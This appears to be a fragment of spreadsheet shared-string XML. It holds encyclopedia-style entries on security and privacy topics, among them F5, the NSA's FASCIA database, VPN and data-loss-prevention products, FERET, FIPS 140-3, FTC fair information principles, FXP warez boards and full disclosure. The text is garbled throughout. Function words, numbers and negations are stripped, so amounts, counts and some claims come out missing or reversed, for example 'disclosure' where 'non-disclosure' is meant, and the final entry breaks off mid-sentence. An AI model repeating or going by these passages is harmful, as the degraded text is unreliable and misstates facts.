    <t>inc. american technology company specializing application security, multi-cloud management, online fraud prevention, application delivery networking (adn), application availability performance, network security, access authorization. headquartered seattle, washington tower, additional offices countries focusing account management, global services support, product development, manufacturing, software engineering, administrative jobs. notable office locations include spokane, washington; york, york; boulder, colorado; london, england; jose, california; francisco, california.f5's originally offered application delivery controller (adc) technology, expanded application layer, automation, multi-cloud, security services. ransomware, data leaks, ddos, attacks businesses sizes arising, companies continued reinvent themselves. while majority f5's revenue continues attributed hardware products big-ip iseries systems, company begun offer additional modules proprietary operating system, tmos (traffic management operating system.) these modules listed include, limited local traffic manager (ltm), advanced application firewall (awaf), (previously named gtm), access policy manager (apm). these offer organizations running big-ip ability deploy load balancing, layer application firewalls, single sign-on (for azure active directory, ldap, okta), well enterprise-level vpns. while big-ip traditionally hardware product, offers virtual machine, branded big-ip virtual edition. big-ip virtual edition cloud agnostic deployed on-premises public and/or hybrid cloud environment. f5's customers include microsoft, oracle, alaska airlines, tesla, meta. corporate history inc., originally named labs" formerly branded networks, inc." established 1996. currently, company's public facing branding generally presents company "f5." 1997, launched first product, load balancer called big-ip. big-ip served purpose reallocating server traffic away overloaded servers. june 1999, company initial public offering listed nasdaq stock exchange symbol ffiv.in 2017, françois locoh-donou replaced john mcadam president ceo. later 2017, launched dedicated site organization focused gathering global threat intelligence data, analyzing application threats, publishing related findings, dubbed labs” company's history. team continues research application threats publish findings every week. 2017, announced would move longtime headquarters waterfront near seattle center downtown seattle skyscraper called tower. move occurred early 2019. employees include igor sysoev, author nginx; dahl-nygaard laureate gilad bracha; google click fraud czar shuman ghosemajumder; defense.net founder barrett lyon. fortune companies load balancing, layer application security, fraud prevention, management. product offerings big-ip f5's big-ip product family comprises hardware, modularized software, virtual appliances tmos operating system. depending appliance selected, big-ip product modules added. big-ip history september 2004, networks released version big-ip software addition appliances software. version also marked introduction company's tmos architecture, enhancements including: moved linux handle system management functions (disks, logging, bootup, console access, etc.) creation traffic management microkernel (tmm) directly talk networking hardware handle network activities. creation standard full-proxy mode, fully terminates network connections big-ip establishes connections big-ip member servers pool. this allows optimum stacks sides well complete ability modify traffic either direction.in late 2021, introduced next-generation big-ip hardware platforms, rseries velos chassis platform. these next-generation systems replace previous generation iseries viprion chassis system. nginx part nginx, inc. acquisition 2019, offers premium, enterprise-level version nginx advanced features, multiple support slas, regular software updates. hourly annual subscription options available multiple levels support, professional services, training. distributed cloud services during agility 2022, announced product offering built platforms big-ip, shape security, volterra. first product available market saas-based application protection (waap) solution. distributed cloud services saas-based security, networking, application management services enable customers deploy, secure, operate applications cloud-native environment wherever needed–data center, multi-cloud, network enterprise edge. acquisitions nginx, inc. march 2019, acquired nginx, inc., company responsible widely used open-source server software, $670 million. shape security, inc. january 2020, acquired shape security, inc., artificial intelligence-based detection company, billion. also sells products protect applications fraud. previous shape security-branded solutions included distributed cloud services. volterra, inc. january 2021, acquired volterra, inc., edge networking company, $500 million. sells saas security services. previous volterra-branded solutions included distributed cloud services. threat stack, inc. october 2021, acquired threat stack, inc., boston cloud computing security startup company reported million. references external links official website business data</t>
  </si>
  <si>
    <t>FASCIA (database)</t>
  </si>
  <si>
    <t>fascia database created used u.s. national security agency contains trillions device-location records collected variety sources. existence revealed 2013 global surveillance disclosure edward snowden. scope surveillance fascia database stores various types information, including location area codes (lacs), cell tower (cellids), visitor location registers (vlrs), international mobile station equipment identity (imeis) msisdns (mobile subscriber integrated services digital network-numbers).over period seven months, terabytes location data collected stored database. gallery also dishfire references</t>
  </si>
  <si>
    <t>SaferNet</t>
  </si>
  <si>
    <t>safernet brazilian non-governmental organization combats internet crime partnership federal public ministry. facilitates anonymous reporting provides information training internet safety security. safernet facilitates anonymous reporting crimes, extra consideration preventing investigating child pornography, identity theft various hate crimes. also works government improve legislation internet-related crimes. safernet also educates, trains, mobilizes public issues relating rights safety. 2006, safernet federal public ministry brought suit google's brazilian business unit alleging google policing orkut pages enough prevent pornography hate crimes. complying judge's ruling, google provided requested user information brazilian authorities. references external links safernet official homepage</t>
  </si>
  <si>
    <t>SaferSurf</t>
  </si>
  <si>
    <t>safersurf software product anonymous internet surfing. aside offering anonymity, several features, geolocation proxy service bypassing country restrictions. safersurf runs centrally server need local installation. safersurf created developed team nutzwerk, german software company headquartered leipzig developing internet technologies. obtained certification 2005, 2006, 2007, 2008 2009. tested wide range viruses false alarms. features safersurf provides various features: malware checking: potentially dangerous online enquiries rooted safersurf proxy server examines data malware reach computer. dangerous undesirable data detected, removed data stream internet. protection anonymity: safersurf calls websites user's behalf, making impossible store user's address. also, whenever user goes website another, safersurf deletes referrer information data stream. finally, provides list known "eavesdroppers". spam phishing e-mail protection faster internet access: high-speed servers gbit connections. access blocked websites: unblock stick lets user bypass firewalls restrictions without needing administrative rights machine. when private mode set, internet browser store traces user's activity. setting maximum lifespan cookies unblocking videos youtube media portals: safersurf's different proxy locations bypass country restrictions, websites maintain full functionality special ssl-proxy-server loads website directly using encrypted connection. geolocation function allows user adopt specific country. storing user's address: that way, even safersurf can't link user browsed content. reception when safersurf released 2003, media praised speed. hamburger abendblatt wrote: "surf times faster, virus-free: service offered company nutzwerk. (...) even slow modem connection, data reaches goal faster (...)" pocket magazine wrote: "indeed, assistance safersurf speed pages display three times faster (...) safersurf speed works independently internet connection (standard modem, isdn, dsl, mobile communications, lan, etc.) use."other media gave weight anonymity protection. bild's computer magazine tested several anonymity programs cited "reliable anonymization" among advantages safersurf. year, macworld praised spam-filtering service. references external links official website</t>
  </si>
  <si>
    <t>SaferVPN</t>
  </si>
  <si>
    <t>safervpn service developed safer social, ltd. network protects user data wi-fi security risks end-to-end encryption user connections. history safervpn released 2013 cybersecurity software developers, including founders amit bareket sagi gidali. safervpn’s parent company began raising capital creating patenting system created enforcement identifying catching thieves. microsoft imagine competition, first application cofounders amit bareket sagi gidali assembled together made second place. safervpn network infrastructure served basis bareket gidali next company, perimeter initial product development. technology safervpn uses protocols secure data transmitted network. each protocol varies data secured. safervpn’s supported protocols include: openvpn, commonly used protocol performance security level. point-to-point tunneling protocol (pptp), commonly used protocol uses basic encryption gives users fast connection speeds. layer tunneling protocol (l2tp/ipsec), secure slower protocols. l2tp good option openvpn ikev2 aren’t available. unlike pptp, l2tp/ipsec requires shared certificates. ikev2, newest protocol available. fastest protocols, secure stable, supported platforms. also comparison virtual private network services references</t>
  </si>
  <si>
    <t>Safetica Technologies</t>
  </si>
  <si>
    <t>safetica european data loss prevention software (dlp) vendor. safetica designed contextual protection data endpoint level. blocks erroneous malicious actions might lead sensitive files leaving company. safetica also identify wasted costs connected work productivity ineffective software licenses wasted print. safetica technologies began developing data loss prevention software (dlp) designed contextual protection data endpoint level 2011. safetica utilised various organisations countries worldwide. history company's history goes back 2007 group security professionals founder jakub mahdal started developing security solutions czech republic. 2011 company started using name safetica technologies introduced first version product called safetica dlp. soon partnered top-class investor ondřej tomek, $1,000,00 research development first customers abroad. 2013 safetica started distribution markets asia middle east. 2015 safetica technologies received $1,500,000 investment product development petr žikeš became ceo. 2016 company partnered global antivirus company eset bundle products antivirus products, means safetica distributed throughout global sales network covering countries. november 2019, safetica announced partnership seclore, provider industry's first, open data-centric security platform, bring automated detection, protection, tracking sensitive information enterprises. products safetica context content-aware protection unstructured data (e.g. autocad files) structured data (e.g. credit card numbers) external device management (usb, cd/dvd, firewire) mobile device management protection danger loss theft encryption computers external devices productivity management, websites applications blocking, print control safetica auditor audit internal security file operations monitoring employees productivity monitoring safetica mobile company data protection mobile devices secure device lost manage configure mobile devices references</t>
  </si>
  <si>
    <t>FERET (facial recognition technology)</t>
  </si>
  <si>
    <t>facial recognition technology (feret) program government-sponsored project aimed create large, automatic face-recognition system intelligence, security, enforcement purposes. program began 1993 combined leadership harry wechsler george mason university (gmu) jonathan phillips army research laboratory (arl) adelphi, maryland resulted development facial recognition technology (feret) database. goal feret program advance field face recognition technology establishing common database facial imagery researchers setting performance baseline face-recognition algorithms.potential areas face-recognition technology could used include: automated searching books using surveillance photos controlling access restricted facilities equipment checking credentials personnel background security clearances monitoring airports, border crossings, secure manufacturing facilities particular individuals finding logging multiple appearances individuals time surveillance videos verifying identities machines searching photo records fraud detectionthe feret database used research groups currently managed national institute standards technology (nist). 2017, feret database used train artificial intelligence programs computer vision algorithms identify sort faces. history feret program first began unify large body face-recognition technology research standard database. before program's inception, researchers created facial imagery database attuned specific area study. these personal databases small usually consisted images less individuals. notable exceptions following: alex pentland’s database around 7500 facial images massachusetts institute technology (mit) joseph wilder's database around individuals rutgers university christoph malsburg’s database around facial images university southern california (usc)the lack common database made difficult compare results face recognition studies scientific literature report involved different assumptions, scoring methods, images. most papers published images common database followed standard testing protocol. result, researchers unable make informed comparisons performances different face-recognition algorithms.in september 1993, feret program spearheaded harry wechsler jonathan phillips sponsorship u.s. department defense counterdrug technology development program. phase first facial images feret database collected august 1993 december 1994, time period known phase pictures initially taken 35-mm camera facilities, physical setup used photography session keep images consistent. individual, pictures taken sets, including frontal views, right left profile, right left quarter profile, right left half profile, sometimes five extra locations. therefore, images consisted images person. phase feret database collected sets images, resulting 5000 total images.at phase five organizations given opportunity test face-recognition algorithm newly created feret database order compare performed other. there five principal investigators were: mit, alex pentland rutgers university, joseph wilder analytic science company (tasc), gale gordon university illinois chicago (uic) university illinois urbana-champaigne, lewis sadler thomas huang usc, christoph malsburgduring evaluation, three different automatic tests given principal investigators without human intervention: large gallery test, served baseline algorithms performed database properly tuned. false-alarm test, tested well algorithm monitored airport suspected terrorists. rotation test, measured well algorithm performed images individual gallery different poses compared probe set.for test trials, algorithms developed managed outperform three algorithms phase evaluation. phase phase began phase time, feret database acquired sets facial images. start phase evaluation march 1995, database contained 1109 sets images total 8525 images individuals. during second evaluation, algorithms phase evaluation given single test. however, database contained significantly duplicate images (463, compared previous 60), making test challenging. phase afterwards, feret program entered phase another sets facial images added database. phase evaluation, took place september 1996, aimed gauge progress algorithms since phase assessment also identify strengths weaknesses algorithm determine future objectives research. 1996, feret database accumulated total 14,126 facial images pertaining 1199 different individuals well duplicate sets images.as result feret program, researchers able establish common baseline comparing different face-recognition algorithms create large standard database facial images open research.in 2003, darpa released high-resolution, 24-bit color version images feret database (existing reference). references external links feret nist website color feret database feret nist documents</t>
  </si>
  <si>
    <t>Safety barrier</t>
  </si>
  <si>
    <t>safety barrier component prevents passage dangerous area, commonly used mitigate risk. safety barriers hard barriers physically restricting passage soft barriers control circuits based presence foreign bodies. description safety barrier component prevents passage dangerous area. commonly used mitigate risk hazard-barrier-target model, studied safety science. work safe victoria australian organization) defines safety barrier device that: physically separate work area traveled way, designed resist penetration out-of control vehicle, properties redirect out-of-control vehicle back road away work area. types barriers hard barriers fixed removable guards prevent entry. these include fences, traffic barriers, crush barriers. soft barriers devices light curtains. they detect presence foreign body tied control circuit stop machine. components hard barriers fixed ground bollard gate, removable stands, clipped structure. regardless barrier type, components overall assembly similar.the material rails used stop flow objects protected area must durable strong enough withstand impacts related environment installed; example, guard rail side road must able contain safely stop drastically slow vehicle weighing tons (cable barriers effective tractor trailers), whereas pedestrian safety barrier needs tall enough, designed lattice effect keep people climbing highly visible used display caution. applications safety barriers vary depending application. industrial setting, safety barrier fence window, designed keep operator away moving parts hazards. railings closed cornered rounded flared edges prevent damage personnel machinery event collision. safety barriers also used protect corners fixtures, support columns, exposed pipes cables, designated areas work floor. automotive setting, barrier traffic barrier jersey barrier, separating lanes/directions traffic flow. crowd control, terraces crush barriers reduce risk human crush large crowds. also platform screen doors references</t>
  </si>
  <si>
    <t>MaXware</t>
  </si>
  <si>
    <t>maxware provider identity management, virtual directory federation solutions. company located norway, united kingdom, australia united states. maxware sold 2007.maxware best known flagship products directory synchronisation engine (dse) virtual directory server (mvd), designed specifically deployment high-volume, high-complexity environments. maxware’s acts abstraction layer, extracting identity context information various application data silos. re-mapping underlying sources presenting identity data customized views needs enterprise applications, enabled authentication fine-grained authorization identity management context-driven applications. maxware’s global customer base included companies fields banking, finance, insurance, government, communications, manufacturing, education, entertainment healthcare. headquartered trondheim, norway, maxware satellite offices freehold, ipswich, distribution channels throughout world. history history maxware product range started norsk data (nd). when discontinued notis office software development 1989. former employees founded company notis simultaneously, televerket (now telenor) spun email directories client work another norwegian startup, maxware 1996, companies merged, continued name maxware enforce successful brand name. product currently known netweaver identity management origins 1995, project swedish post, needed user management tool x.500 directory service. x.500 standard concern users added deleted directory. management tool called 'add-on service' directory service), soon changed name mddm (maxware directory data manager). later renamed (data synchronisation engine). virtual directory server (mvd) similar evolution. some people maxware development team 1995 still working product labs trondheim. maxware independent software vendor company, started 1998 joint venture business partner founder tore wold name maxware international (mias). mias acquired messaging products development team maxware 2001. 2002, mias management team together employees completed management buyout remaining shares maxware mias changed name maxware 2004. maxware soon became globally recognised innovator developing identity management solutions. during period company established subsidiaries united kingdom australia. series round funding received viking venture four seasons venture. companies tasked develop successful exit strategy, market started consolidate.maxware acquired 2007. products live netweaver identity management continue used largest corporations governmental agencies world. 2014, merged trondheim office labs sofia, bulgaria, closed norway office, marking years identity management development norway. products awards maxware known x.400 secure messaging solutions identity management solutions: mailmax.400 mailmax.400 popular x.400 messaging software still sold supported addonmail maxware directory explorer (mde) first freeware ldap browsers maxware directory synchronisation engine (dse) maxware’s entry level meta directory product, re-sold nexor. maxware identity center (mic) maxware’s flagship product corporate identity integration using oracle server rdbms maxware virtual directory (mvd) maxware’s virtual directory flagship productaward: challenge (pkic) reference implementation developed supplied challenge utimaco, directory used produced supplied maxware. references</t>
  </si>
  <si>
    <t>FIPS 140-3</t>
  </si>
  <si>
    <t>federal information processing standard publication 140-3, (fips 140-3), u.s. government computer security standard used approve cryptographic modules. title security requirements cryptographic modules. initial publication march 2019 supersedes fips 140-2. purpose national institute standards technology (nist) issued fips publication series coordinate requirements standards cryptography modules include hardware software components. federal agencies departments validate module covered existing fips certificate specifies exact module name, hardware, software, firmware, and/or applet version numbers. cryptographic modules produced private sector open source communities u.s. government regulated industries (such financial health-care institutions) collect, store, transfer, share disseminate sensitive unclassified (sbu) information. history efforts update fips standard date back early 2000s. fips 140-3 (2013 draft) scheduled signature secretary commerce august 2013, however never happened draft subsequently abandoned. 2014, nist released substantially different draft fips 140-3, version effectively directing international organization standardization/international electrotechnical commission (iso/iec) standard, 19790:2012, replacement fips 140-2. 2014 draft fips 140-3 also abandoned, although iso/iec 19790 ultimately come fruition. august 2015, nist formally released statement federal register asking comments potential portions iso/iec 19790:2014 update fips 140-2. reference 2014-version iso/iec 19790 inadvertent error federal registry posting, 2012 recent version. iso/iec 19790 reviewed re-confirmed recently 2018, without changes, hence retaining 2012 version nomenclature. update process fips hamstrung deep technical issues topics hardware security apparent disagreement government path forward. abandoned 2013 draft fips 140-3 required mitigation non-invasive attacks validating higher security levels, introduced concept public security parameter, allowed deference certain self-tests specific conditions met, strengthened requirements user authentication integrity testing. cryptographic module validation program fips standard established cryptographic module validation program (cmvp) joint effort nist communications security establishment (csec) canadian government, handled cccs, canadian centre cyber security, centralized initiative within csec agency.security programs overseen nist cccs focus working government industry establish secure systems networks developing, managing promoting security assessment tools, techniques, services, supporting programs testing, evaluation validation; addresses areas development maintenance security metrics, security evaluation criteria evaluation methodologies, tests test methods; security-specific criteria laboratory accreditation; guidance evaluated tested products; research address assurance methods system-wide security assessment methodologies; security protocol validation activities; appropriate coordination assessment-related activities voluntary industry standards bodies assessment regimes. approval issuance march 2019, united states secretary commerce wilbur ross approved fips 140-3, security requirements cryptographic modules succeed fips 140-2. fips 140-3 became effective september 2019. fips 140-3 testing began september 2020, although fips 140-3 validation certificates issued yet. fips 140-2 testing still available september 2021, creating overlapping transition period year. fips 140-2 test reports remain cmvp queue still granted validations date, fips 140-2 validations moved historical list september 2026 regardless actual final validation date. also common criteria tamper resistance fips fips 140-2 hardware security module references external links "proceedings nist physical security testing workshop". nist. 2005-09-26. archived original 2016-03-04. retrieved 2016-01-10. "fips 140-3 development". nist. 2013-04-30. retrieved 2013-05-18. "cryptographic module validation program (cmvp)". nist. 2013-04-05. retrieved 2013-05-18.</t>
  </si>
  <si>
    <t>FIPS 199</t>
  </si>
  <si>
    <t>fips (federal information processing standard publication 199, standards security categorization federal information information systems) united states federal government standard establishes security categories information systems used federal government, component risk assessment. fips fips mandatory security standards required fisma. fips requires federal agencies assess information systems categories confidentiality, integrity availability, rating system low, moderate high impact category. severe rating category becomes information system's overall security categorization. external links https://doi.org/10.6028/nist.fips.199 https://csrc.nist.gov/publications/detail/fips/199/final. nist link fips 199.</t>
  </si>
  <si>
    <t>Structural vulnerability (computing)</t>
  </si>
  <si>
    <t>computing, structural vulnerability system weakness consists several so-called component vulnerabilities. this type weakness generally emerges several system architecture flaws. example structural vulnerability person working critical part system security training, doesn’t follow software patch cycles likely disclose critical information phishing attack. references</t>
  </si>
  <si>
    <t>FTC fair information practice</t>
  </si>
  <si>
    <t>united states federal trade commission's fair information practice principles (fipps) guidelines represent widely accepted concepts concerning fair information practice electronic marketplace. introduction fair information practice principles result commission's inquiry online entities collect personal information safeguards assure practice fair provides adequate information privacy protection. studying online privacy issues since 1995, 1998 report, commission described widely accepted fair information practice principles notice, choice, access, security. commission also identified enforcement, reliable mechanism provide sanctions noncompliance critical component governmental self-regulatory program protect online privacy. history development fair information practice initially proposed named secretary's advisory committee automated personal data systems 1973 report, records, computers rights citizens, issued response growing automated data systems containing information individuals. central contribution advisory committee development code fair information practice automated personal data systems. privacy protection study commission also contributed development fips principles 1977 report, personal privacy information society.as privacy laws spread countries europe, international institutions took privacy focus international implications privacy regulation. 1980, council europe adopted convention protection individuals regard automatic processing personal data. time, organisation economic cooperation development (oecd) proposed similar privacy guidelines oecd guidelines protection privacy transborder flows personal data. oecd guidelines, council europe convention, european union data protection directive relied fips core principles. three organizations revised extended original u.s. statement fips, oecd privacy guidelines version often cited subsequent years. principles core principles privacy addressed principles are: notice/awareness consumers given notice entity's information practices personal information collected them. this requires companies explicitly notify following: identification entity collecting data; identification uses data put; identification potential recipients data; nature data collected means collected; whether provision requested data voluntary required; steps taken data collector ensure confidentiality, integrity quality data.2. choice/consent choice consent on-line information-gathering sense means giving consumers options control data used. specifically, choice relates secondary uses information beyond immediate needs information collector complete consumer's transaction. typical types choice models 'opt-in' 'opt-out.' 'opt-in' method requires consumers affirmatively give permission information used purposes. without consumer taking affirmative steps 'opt-in' system, information gatherer assumes cannot information purpose. 'opt-out' method requires consumers affirmatively decline permission uses. without consumer taking affirmative steps 'opt-out' system, information gatherer assumes consumer's information purposes. each systems designed allow individual consumer tailor information gatherer's information preferences checking boxes grant deny permission specific purposes rather using simple "all nothing" method.3. access/participation access defined fair information practice principles includes consumer's ability view data collected, also verify contest accuracy. this access must inexpensive timely order useful consumer.4. integrity/security information collectors ensure data collect accurate secure. they improve integrity data cross-referencing reputable databases providing access consumer verify information collectors keep data secure protecting internal external security threats. they limit access within company necessary employees protect internal threats, encryption computer-based security systems stop outside threats.5. enforcement/redress order ensure companies follow fair information practice principles, must enforcement measures. identified three types enforcement measures: self-regulation information collectors appointed regulatory body; private remedies give civil causes action individuals whose information misused violators; government enforcement include civil criminal penalties levied government. enforcing principles currently version fair information principles recommendations maintaining privacy-friendly, consumer-oriented data collection practices, enforceable law. enforcement adherence principles principally performed self-regulation. has, however, undertaken efforts evaluate industry self-regulation practices, provides guidance industry developing information practices, uses authority enforce promises made corporations privacy policies.since self-regulatory initiatives fall short ideal implementation principles (the 2000 report noted, example, self-regulatory initiatives lacked meaningful monitoring enforcement policies practices), commission recommends united states congress enact legislation that, conjunction continuing self-regulatory programs, ensure adequate protection consumer privacy online. "the legislation recommended commission would forth basic level privacy protection consumer-oriented commercial sites" "would establish basic standards practice collection information online...consumer-oriented commercial sites collect personal identifying information consumers online... would required comply four widely-accepted fair information practices."the principles, however, form basis many individual laws federal state levels—called "sectoral approach." examples fair credit reporting act, right financial privacy act, electronic communications privacy act, video privacy protection (vppa), cable television protection competition act. additionally, principles continue serve model privacy protections newly developing areas, designing smart grid programs. other proposals regarding 'fair information' organisation economic co-operation development (oecd) european union, among others, adopted comprehensive approaches fair information practices. oecd principles provide added protections individual participation principle specific requirements made access modification personally collected information individual accountability principle data controller accountable complying measures give effect principles stated above).the european union data protection directive another model comprehensive privacy protections. criticism principles fipps criticized scholars less comprehensive scope privacy regimes countries, particular european union oecd countries. additionally, ftc's formulation principles criticized comparison issued agencies. ftc's 2000 version fips shorter less complete privacy protection principles issued privacy office department homeland security 2008, include eight principles closely aligned oecd principles.some privacy community criticize fipps weak, allowing many exemptions, failing require privacy agency, failing account weaknesses self-regulation, keeping pace information technology. many privacy experts called omnibus privacy protection legislation lieu current blend self-regulation selective codification certain sectors.critics business perspective often prefer limit fips reduced elements notice, consent, accountability. they complain elements unworkable, expensive, inconsistent openness free speech principles.some commentators argue consumers fair consent process. example, customers provide health information social insurance number health card number making on-line appointment dental check-up. customers commonly asked sign agreement stating ‘third-party access information provide certain conditions.’ certain conditions rarely specified part agreement. later third-party share information subsidiary institutions. thus, access customers’ personal information beyond control. also federal trade commission information protection policy information security data protection directive references external links 2000 privacy report privacy online: report congress oecd fair information practices oecd guidelines protection privacy transborder flows personal data privacy 1974, u.s.c. 552a.</t>
  </si>
  <si>
    <t>Strong authentication</t>
  </si>
  <si>
    <t>strong authentication notion several definitions. strong (customer) authentication definitions strong authentication often confused two-factor authentication (more generally known multi-factor authentication), strong authentication necessarily multi-factor authentication. soliciting multiple answers challenge questions considered strong authentication but, unless process also retrieves 'something have' 'something are', would considered multi-factor authentication. ffiec issued supplemental guidance subject august 2006, clarified, definition true multifactor authentication requires solutions three categories factors. using multiple solutions category would constitute multifactor authentication."another commonly found class definitions relates cryptographic process, precisely, authentication based challenge–response protocol. this type definition found handbook applied cryptography. this type definition necessarily relate two-factor authentication, since secret used challenge–response authentication scheme simply derived password (one factor).a third class definitions says strong authentication form authentication verification accomplished without transmission password. this case example definition found fermilab documentation.the fourth class, legal standing within european economic area, strong customer authentication. fast identity online (fido) alliance striving establish technical specifications strong authentication members certified products. thus, term strong authentication used long notion strong defined context use. also secure electronic authentication fido alliance initiative open authentication reliance authentication self-sovereign identity references</t>
  </si>
  <si>
    <t>FXP board</t>
  </si>
  <si>
    <t>board internet forum composed members distribute access servers "pubstros". these forums used provide access servers usually containing warez. boards generally differ forums selective membership, typically opening public registration limited time closing notice. there several types members boards, job: scanners scan ranges vulnerable computers fast internet connection. once vulnerable system found, information passed rest board subsequently "hackers". hackers gain access install server systems scanners found using different tools depending vulnerability. fillers warez server, transferring files sources newly compromised servers "hackers" posted admin details servers.most boards time limit release time release posted "race". release complete posted limit posted normal fill mirror section. still posted race area nuked moved appropriate section. boards main reason much activity servers, links posted multiple boards. leechers soon exploit servers, sometimes causing huge slow-down consumed bandwidth. also topsite (warez) warez scene</t>
  </si>
  <si>
    <t>Fab lab</t>
  </si>
  <si>
    <t>(fabrication laboratory) small-scale workshop offering (personal) digital fabrication.a typically equipped array flexible computer-controlled tools cover several different length scales various materials, make "almost anything". this includes technology-enabled products generally perceived limited mass production. while labs compete mass production associated economies scale fabricating widely distributed products, already shown potential empower individuals create smart devices themselves. these devices tailored local personal needs ways practical economical using mass production. movement closely aligned movement, open-source hardware, maker culture, free open-source movement, shares philosophy well technology them. history program initiated broadly explore content information relates physical representation under-served community powered technology grassroots level. program began collaboration grassroots invention group center bits atoms media massachusetts institute technology grant national science foundation (washington, d.c.) 2001.vigyan ashram india first outside mit. established 2002 received capital equipment nsf-usa iitk while grassroots invention group longer media lab, center bits atoms consortium still actively involved continuing research areas related description fabrication operate maintain labs worldwide (with excmobile lab). concept also grew popular class (mas.863) named "how make (almost) anything". class still offered fall semesters. popular equipment projects flexible manufacturing equipment within include: mainly, rapid prototyper: typically printer plastic plaster parts 3-axis machines: axes, computer-controlled subtractive milling turning machines printed circuit board milling etching: two-dimensional, high precision milling create circuit traces pre-clad copper boards microprocessor digital electronics design, assembly, test stations cutters, sheet material: laser cutter, plasma cutter, water cutter, knife cutter. fabfi larger projects undertaken labs include free community fabfi wireless networks afghanistan, kenya us). first city-scale fabfi network, afghanistan, remained place active three years community supervision special maintenance. network kenya, (based university nairobi (uon)) building experience, started experiment controlling service quality providing added services make network cost-neutral. academy academy leverages network teach hands-on, digital fabrication skills. students convene "supernodes" week course earn diploma build portfolio. cases, diploma accredited offers academic credit. curriculum based mit's rapid prototyping course 863: make (almost) anything. course estimated cost us$5000, varies location available scholarship opportunities. course materials publicly archived online here. city city explore innovative ways creating city future. focuses transforming shaping materials sourced used. this transformation lead shift urban model 'pito dido' 'product-in, trash-out' data-in, data-out'. this eventually transform cities self-sufficient entities 2054; line pledge barcelona made. city links movement, make human capital. cities make innovative spirit users labs. green labs green network, started catalonia's green fablab, made fablabs embrace concepts open source symbiotic economy circular economy green entrepreneurship. example, promote distributed recycling, locals recycled plastic waste turning locally sourced shredded plastic items value fused particle fabrication/ fused granular fabrication (fpf/fgf) printing, good economic also good environmental option. list labs maintained listing official labs, worldwide, 2014. nowadays listing official labs maintained community website fablabs.io. november 2019, existed 1830 labs world total. currently labs every continent except antarctica. also printing hacker culture hackerspace makerspace open design open hardware open source ecology reprap reprap project produced free open source software (foss) printer. techshop references further reading gershenfeld, neil (2005). fab: coming revolution desktop—from personal computers personal fabrication. york: basic books. isbn 0-465-02745-8. walter-herrmann, julia bueching, corinne, eds. (2013). fablab machines, makers inventors. bielefeld, germany: transcript. isbn 978-3-8376-2382-6. external links fabfoundation</t>
  </si>
  <si>
    <t>Federal Service for Technical and Export Control</t>
  </si>
  <si>
    <t>federal service technical export control (fstec fstek) military agency russian federation, russian ministry defence. licenses export weapons dual-use technology items, also responsible russian military information security.fstec maintains data security threats database, russia's national vulnerability database. requires western technology companies submit source code trade secrets allowing products imported russia. fstec also liaises fsb, controls cryptography russia.in 2019, fstec granted astra linux special status regarding processing russian classified information. references</t>
  </si>
  <si>
    <t>Hackers: Wizards of the Electronic Age</t>
  </si>
  <si>
    <t>hackers: wizards electronic 1985 documentary hacker community. film includes footage hacker conference, interviews programmers created personal computer revolution, including bill atkinson, bill budge, doug carlston, john draper, andrew fluegelman, felsenstein, richard greenblatt, andy hertzfeld, david hughes, susan kare, richard stallman, wallace, robert woodhead, steve wozniak, others. interviews documentary shot long weekend 1984 hacker conference whole earth catalog editors stewart brand kevin kelly sausalito, california. event (the hacker conference) inspired steven levy's book hackers: heroes computer revolution. references external links official website hackers: wizards electronic imdb</t>
  </si>
  <si>
    <t>Full disclosure (computer security)</t>
  </si>
  <si>
    <t>field computer security, independent researchers often discover flaws software abused cause unintended behaviour; flaws called vulnerabilities. process analysis vulnerabilities shared third parties subject much debate, referred researcher's disclosure policy. full disclosure practice publishing analysis software vulnerabilities early possible, making data accessible everyone without restriction. primary purpose widely disseminating information vulnerabilities potential victims knowledgeable attack them.in 2007 essay topic, bruce schneier stated "full disclosure practice making details security vulnerabilities public damned good idea. public scrutiny reliable improve security, secrecy makes less secure". leonard rose, co-creator electronic mailing list superseded bugtraq become facto forum disseminating advisories, explains believe security obscurity, know, full disclosure ensure everyone, insiders, access information need." vulnerability disclosure debate controversy around public disclosure sensitive information new. issue full disclosure first raised context locksmithing, 19th-century controversy regarding whether weaknesses lock systems kept secret locksmithing community, revealed public. today, three major disclosure policies others categorized: disclosure, coordinated disclosure, full disclosure. major stakeholders vulnerability research disclosure policies shaped various motivations, uncommon observe campaigning, marketing lobbying preferred policy adopted chastising dissent. many prominent security researchers favor full disclosure, whereas vendors prefer coordinated disclosure. disclosure generally favored commercial exploit vendors blackhat hackers. coordinated vulnerability disclosure coordinated vulnerability disclosure policy researchers agree report vulnerabilities coordinating authority, reports vendor, tracks fixes mitigations, coordinates disclosure information stakeholders including public. cases coordinating authority vendor. premise coordinated disclosure typically nobody informed vulnerability software vendor says time. while often exceptions variations policy, distribution must initially limited vendors given privileged access nonpublic research. original name approach “responsible disclosure”, based essay microsoft security manager scott culp “it's time information anarchy” (referring full disclosure). microsoft later called term phased favor “coordinated vulnerability disclosure” (cvd).although reasoning varies, many practitioners argue end-users cannot benefit access vulnerability information without guidance patches vendor, risks sharing research malicious actors great little benefit. microsoft explain, "[coordinated disclosure] serves everyone's best interests ensuring customers receive comprehensive, high-quality updates security vulnerabilities exposed malicious attacks update developed." full disclosure full disclosure policy publishing information vulnerabilities without restriction early possible, making information accessible general public without restriction. general, proponents full disclosure believe benefits freely available vulnerability research outweigh risks, whereas opponents prefer limit distribution. free availability vulnerability information allows users administrators understand react vulnerabilities systems, allows customers pressure vendors vulnerabilities vendors otherwise feel incentive solve. there fundamental problems coordinated disclosure full disclosure resolve. customers know vulnerabilities, cannot request patches, vendors experience economic incentive correct vulnerabilities. administrators cannot make informed decisions risks systems, information vulnerabilities restricted. malicious researchers also know flaw long period time continue exploiting flaw.discovery specific flaw vulnerability mutually exclusive event, multiple researchers differing motivations discover flaws independently. there standard make vulnerability information available public, researchers often mailing lists dedicated topic, academic papers industry conferences. disclosure disclosure policy vulnerability information shared, shared non-disclosure agreement (either contractually informally). common proponents non-disclosure include commercial exploit vendors, researchers intend exploit flaws find, proponents security obscurity. debate arguments coordinated disclosure researchers favor coordinated disclosure believe users cannot make advanced knowledge vulnerabilities without guidance vendor, majority best served limiting distribution vulnerability information. advocates argue low-skilled attackers information perform sophisticated attacks would otherwise beyond ability, potential benefit outweigh potential harm caused malevolent actors. only vendor prepared guidance even unsophisticated users digest information made public. this argument presupposes vulnerability discovery mutually exclusive event, person discover vulnerability. there many examples vulnerabilities discovered simultaneously, often exploited secrecy discovery researchers. while exist users cannot benefit vulnerability information, full disclosure advocates believe demonstrates contempt intelligence users. while true users cannot benefit vulnerability information, they're concerned security networks position hire expert assist would hire mechanic help car. arguments disclosure disclosure typically used researcher intends knowledge vulnerability attack computer 